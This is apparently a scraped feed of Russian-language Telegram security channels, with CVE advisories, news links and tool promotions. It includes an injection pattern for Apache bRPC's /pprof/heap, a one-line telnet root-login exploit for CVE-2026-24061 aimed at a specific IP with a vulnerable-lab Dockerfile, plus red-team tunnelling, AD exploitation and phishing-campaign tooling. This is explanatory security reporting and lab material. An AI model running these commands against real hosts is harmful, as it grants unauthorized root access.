Forwarded from SecuriXy.kz
🚨 Критическая RCE‑уязвимость в Apache bRPC (CVE‑2025‑60021)
Критичность: CVSS 9.8
Тип: RCE
Компонент: встроенный сервис heap‑профайлера (`/pprof/heap`)
В Apache bRPC параметр extra_options в эндпоинте /pprof/heap передается напрямую в командную строку jemalloc‑профайлера без какой‑либо фильтрации.
🎯 Уязвимые версии
Все версии до 1.15.0.
🔥 Эксплуатация
🔗 PoC:
https://github.com/ninjazan420/CVE-2025-60021-PoC-Apache-bRPC-Heap-Profiler-Command-Injection
🛡 Рекомендации
1. Обновиться до bRPC 1.15.0
2. Либо применить патч из апстрима
3. Закрыть доступ к /pprof/* извне
4. Отключить heap‑профайлер, если он не нужен
🔍 Детекты
Искать обращения к
`extra_options=
extra_options=% (URL‑encoded)
extra_options= внутри JSON или multipart`
Критичность: CVSS 9.8
Тип: RCE
Компонент: встроенный сервис heap‑профайлера (`/pprof/heap`)
В Apache bRPC параметр extra_options в эндпоинте /pprof/heap передается напрямую в командную строку jemalloc‑профайлера без какой‑либо фильтрации.
🎯 Уязвимые версии
Все версии до 1.15.0.
🔥 Эксплуатация
/pprof/heap?extra_options=<cmd>
🔗 PoC:
https://github.com/ninjazan420/CVE-2025-60021-PoC-Apache-bRPC-Heap-Profiler-Command-Injection
🛡 Рекомендации
1. Обновиться до bRPC 1.15.0
2. Либо применить патч из апстрима
3. Закрыть доступ к /pprof/* извне
4. Отключить heap‑профайлер, если он не нужен
🔍 Детекты
Искать обращения к
/pprof/heap с параметрами:`extra_options=
extra_options=% (URL‑encoded)
extra_options= внутри JSON или multipart`
👎1
Хабр
Ущерб от бездумного внедрения ИБ в АСУ ТП: когда «защита» становится угрозой
ИБ в промышленности – новая угроза? В мире промышленных предприятий информационная безопасность становится новой религией. На совещаниях все чаще звучат слова «угроза», «комплаенс», «SOC» и «Zero...
🔗 Ссылка:
https://habr.com/ru/articles/971788/
https://habr.com/ru/articles/971788/
Forwarded from 1N73LL1G3NC3
Chisel-ng
A Rust implementation of chisel for penetration testing and red team operations. Establishes reverse tunnels over SSH-over-WebSocket-over-TLS, allowing operators to pivot through compromised hosts while blending with normal HTTPS traffic.
A Rust implementation of chisel for penetration testing and red team operations. Establishes reverse tunnels over SSH-over-WebSocket-over-TLS, allowing operators to pivot through compromised hosts while blending with normal HTTPS traffic.
👍1
www.opennet.ru
Уязвимости в Java SE, MySQL, VirtualBox и других продуктах Oracle
Компания Oracle опубликовала плановый выпуск обновлений своих продуктов (Critical Patch Update), нацеленный на устранение критических проблем и уязвимостей. В январском обновлении устранено 337 уязвимостей.
🔗Ссылка:
https://opennet.ru/64651/
https://opennet.ru/64651/
www.opennet.ru
Уязвимость в GitLab, позволяющая обойти двухфакторную аутентификацию
Опубликованы корректирующие обновления платформы для организации совместной разработки GitLab - 18.8.2, 18.7.2, 18.6.4, в которых устранена уязвимость (CVE-2026-0723), позволяющая обойти проверку при двухфакторной аутентификации. Для совершения атаки злоумышленник…
🔗Ссылка:
https://opennet.ru/64657/
https://opennet.ru/64657/
Forwarded from AD_POHEQUE
ADScan оснастка для автоматизированного тестирования и пост-эксплуатации Active Directory
позавчера помер crackmapexec, вчера бранясь переезжали на netexec, половина приёмов в powershell, половина в python и каждый раз всё собирается руками под конкретный проект.
вопрос: зачем ещё один AD-сканер, если у всех уже есть все перечисленное выше?
инструмент работает в связке с bloodhound-ce:
- самостоятельно строит цепь эксплуатации: разведка → bloodhound → kerberos-атаки → обработка хэшей и работа с уязвимыми аклями
- живёт как агент: выбрал сценарий, дал учетные данные — он прогнал плейбук и передал лут
- пригоден под оркестрацию, но придется написать собственный mcp
без ai внутри и это скорее плюс.
можно побаловаться и порешать тачки на HTB что бы освоиться. разработчик предоставил демо в котором ADScan прорешал Forest за 3 минуты.
репозиторий:
https://github.com/ADScanPro/adscan
документация:
https://www.adscanpro.com/docs
🤩
позавчера помер crackmapexec, вчера бранясь переезжали на netexec, половина приёмов в powershell, половина в python и каждый раз всё собирается руками под конкретный проект.
вопрос: зачем ещё один AD-сканер, если у всех уже есть все перечисленное выше?
инструмент работает в связке с bloodhound-ce:
- самостоятельно строит цепь эксплуатации: разведка → bloodhound → kerberos-атаки → обработка хэшей и работа с уязвимыми аклями
- живёт как агент: выбрал сценарий, дал учетные данные — он прогнал плейбук и передал лут
- пригоден под оркестрацию, но придется написать собственный mcp
без ai внутри и это скорее плюс.
можно побаловаться и порешать тачки на HTB что бы освоиться. разработчик предоставил демо в котором ADScan прорешал Forest за 3 минуты.
репозиторий:
https://github.com/ADScanPro/adscan
документация:
https://www.adscanpro.com/docs
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Похек (Autoposter)
🖖Гайд по GoPhish: полный цикл настройки
Запустить реалистичную фишинговую рассылку с высоким Inbox Rate — задача не для новичков.
Команда ScanFactory подготовила серию из 3 статей, чтобы даже начинающий специалист смог разобраться в настройке «от и до» и запустить реалистичные фишинговые кампании.
1⃣ Установка GoPhish на VPS
2⃣ Настройка почтового сервера и SPF/DKIM/DMARC
3⃣ Создание фишингового сайта и интеграция с кампанией
Серия охватывает весь процесс: подготовку инфраструктуры, повышение доставляемости писем, создание реалистичных страниц и практическую сборку рабочей схемы для контролируемых фишинговых кампаний.
👉 Подписывайся на канал ScanFactory, чтобы не пропустить полезные гайды и практические кейсы.
#реклама
О рекламодателе
Запустить реалистичную фишинговую рассылку с высоким Inbox Rate — задача не для новичков.
Команда ScanFactory подготовила серию из 3 статей, чтобы даже начинающий специалист смог разобраться в настройке «от и до» и запустить реалистичные фишинговые кампании.
1⃣ Установка GoPhish на VPS
2⃣ Настройка почтового сервера и SPF/DKIM/DMARC
3⃣ Создание фишингового сайта и интеграция с кампанией
Серия охватывает весь процесс: подготовку инфраструктуры, повышение доставляемости писем, создание реалистичных страниц и практическую сборку рабочей схемы для контролируемых фишинговых кампаний.
👉 Подписывайся на канал ScanFactory, чтобы не пропустить полезные гайды и практические кейсы.
#реклама
О рекламодателе
www.opennet.ru
На соревновании Pwn2Own Automotive 2026 продемонстрировано 76 уязвимостей автомобильных систем
Подведены итоги трёх дней соревнований Pwn2Own Automotive 2026, проведённых на конференции Automotive World в Токио. На соревнованиях были продемонстрированы 76 ранее неизвестных уязвимостей (0-day) в автомобильных информационно-развлекательных платформах…
🔗Ссылка:
https://opennet.ru/64662/
https://opennet.ru/64662/
www.opennet.ru
Проект Singularity развивает открытый руткит, обходящий SELinux, Netfilter, LKRG и eBPF
Матеус Алвес (Matheus Alves), исследователь безопасности, специализирующийся на вредоносном ПО, опубликовал обновление проекта Singularity, развивающего открытый руткит для ядра Linux, распространяемый под лицензией MIT. Целью проекта является демонстрация…
🔗Ссылка:
https://opennet.ru/64663/
https://opennet.ru/64663/
🔥1
Forwarded from вольтаж
взломать интернет бесплатно 2026
вот эта штука сверху, которой уже назначен CVE-2026-24061, дает подключиться по telnet сразу как root, без пароля.
что?🐱
Давным давно в 2015 году, почему-то в нашей мировой линии, telnet был неуязвим, но в нём не работал автологин если на машине нет Kerberos.
Суть автологина - автоматически передать юзернейм для логина. Как когда по ssh коннектишься не указав логин, машина автоматически коннектится с именем текущего юзера.
Без Kerberos, этот юзернейм попросту не детектился.
Поэтому разработчики обновили шаблон логина, добавив динамический аргумент %U, что как раз подставляет юзернейм.
Новый шаблон:
и вот тут происходит кабум бабах ракета взрыв🤯
1. В бинаре
2. По RFC 1572, подключаясь по telnet, ты можешь сдать переменные окружения, в том числе
3. содержимое
. . .
Теперь перечитай эксплойт
Да это же уязвимость наargument injection!
Повторим флоу атаки🃏
0. выставляем переменную
1. переменная
2.
3. сервер получает команду
4. бинарь
5. поздравляю,
Dockerfile для тестовой лабы
Если хочешь кишки кода и ветви логики, то читай этот подробный ресерч
USER="-f root" telnet -a 104.16.149.244 23
вот эта штука сверху, которой уже назначен CVE-2026-24061, дает подключиться по telnet сразу как root, без пароля.
что?
Давным давно в 2015 году, почему-то в нашей мировой линии, telnet был неуязвим, но в нём не работал автологин если на машине нет Kerberos.
Суть автологина - автоматически передать юзернейм для логина. Как когда по ssh коннектишься не указав логин, машина автоматически коннектится с именем текущего юзера.
Без Kerberos, этот юзернейм попросту не детектился.
Поэтому разработчики обновили шаблон логина, добавив динамический аргумент %U, что как раз подставляет юзернейм.
Новый шаблон:
/usr/bin/login " -p -h %h %?u{-f %u}{%U}"и вот тут происходит кабум бабах ракета взрыв
1. В бинаре
login есть флаг -f, нужный для "этот юзер уже был аутентифицирован где-то ещё, не надо его проверять снова"2. По RFC 1572, подключаясь по telnet, ты можешь сдать переменные окружения, в том числе
$USER с целевым логином3. содержимое
$USER переменной никак не санитизируется. . .
Теперь перечитай эксплойт
USER="-f root" telnet -a 104.16.149.244 23
Да это же уязвимость на
Повторим флоу атаки
0. выставляем переменную
$USER="-f root" и включаем автологин -a1. переменная
$USER не проверяется, но учитывается сервером2.
$USER подставляется в шаблон логина вместо {%U}3. сервер получает команду
/usr/bin/login -p -f root4. бинарь
login скипает аутентификацию из-за -f5. поздравляю,
ты root
———Dockerfile для тестовой лабы
FROM debian:11-slim
ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && \
apt-get install -y --no-install-recommends \
inetutils-telnetd=2:2.0-1+deb11u2 \
telnet && \
rm -rf /var/lib/apt/lists/*
RUN useradd user1 && \
sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf
COPY docker-entrypoint.sh /docker-entrypoint.sh
EXPOSE 23
CMD ["/usr/sbin/inetutils-inetd", "-d"]
Если хочешь кишки кода и ветви логики, то читай этот подробный ресерч
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1